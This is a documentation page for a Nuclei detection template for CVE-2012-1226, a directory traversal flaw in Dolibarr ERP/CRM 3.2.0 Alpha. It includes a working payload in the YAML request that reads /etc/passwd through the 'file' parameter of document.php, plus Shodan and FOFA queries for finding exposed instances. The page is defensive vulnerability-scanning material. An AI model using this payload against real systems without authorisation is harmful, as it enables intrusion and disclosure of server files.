Skip to content
Nuclei Templates

Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities

ID: CVE-2012-1226

Severity: high

Author: daffainfo

Tags: cve,cve2012,lfi,dolibarr,traversal,edb

Description

Section titled “Description”

Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.

YAML Source

Section titled “YAML Source”
id: CVE-2012-1226


info:
  name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
  author: daffainfo
  severity: high
  description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
  impact: |
    Successful exploitation of these vulnerabilities could allow an attacker to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/36873
    - https://nvd.nist.gov/vuln/detail/CVE-2012-1226
    - http://www.vulnerability-lab.com/get_content.php?id=428
    - http://www.exploit-db.com/exploits/18480
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2012-1226
    cwe-id: CWE-22
    epss-score: 0.09636
    epss-percentile: 0.94766
    cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dolibarr
    product: dolibarr_erp\/crm
    shodan-query: http.favicon.hash:440258421
    fofa-query: icon_hash=440258421
  tags: cve,cve2012,lfi,dolibarr,traversal,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a004730450220727e79fded667738bedeb003ffb9a58b18a62234ab61fe765aaa2f79e4d048d9022100a5d029db73d279e90086eed18d8d7a7d4c9b85db7b1327f7e42774236345194f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-1226.yaml"

View on Github